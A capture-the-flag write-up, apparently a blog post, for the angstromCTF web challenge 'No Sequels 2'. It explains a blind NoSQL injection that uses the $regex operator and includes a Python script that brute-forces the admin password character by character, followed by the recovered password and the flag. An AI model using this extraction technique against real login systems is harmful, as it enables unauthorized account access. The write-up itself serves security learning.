No Sequels 2

Category: Web
Points: 80
Description: This is the sequel to No Sequels. You’ll see the challenge page once you solve the first one.

So from here we are given the following code, we need the actual admin password to get the flag but our input isn’t used in any part of the database query as we can see the code. So we need to find another route. I was stuck on this for a while but then I thought hey, I can utilise the other injection method to extract data.

Looking for a way to get blind nosql injection I came across the $regex operator. Which is perfect!

So here is my payload that I will send


{
username: "admin",
passsword: {"$regex": "^<testing pw goes here>"}
}

So I will loop around the character set and if I successfully log in it means that I have got the first character of the password. If not then check the next one. Once I do get the character I then check for the next chracter by checking them together. I wrote a python script to automate this to make this quicker:

import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="admin"
password=""
url = "https://nosequels.2019.chall.actf.co/login"

cookies = {
"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRoZW50aWNhdGVkIjpmYWxzZSwiaWF0IjoxNTU1NzI4MjkyfQ.DRgByuPZJc-Ayvmdec5ot2CbjbCe6Bf7ucvI93gc1Wc"
}

while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|']:
            print("Testing %s" % password+c)
            payload={
                "username": "admin", 
                "password": {
                    "$regex": "^"+password+c 
                    }
                }

            r = requests.post(url, json = payload, verify = False, cookies=cookies)
            print(r.text)
            if "bad" in r.text:
                print("Found one more char : %s" % (password+c))
                password += c
                break

This will slowly print out the password which ends up being

congratsyouwin

Entering that on the final page successfully logs us in and we get the flag.

FLAG:

actf{still_no_sql_in_the_sequel}

Leave a Reply

Your email address will not be published. Required fields are marked *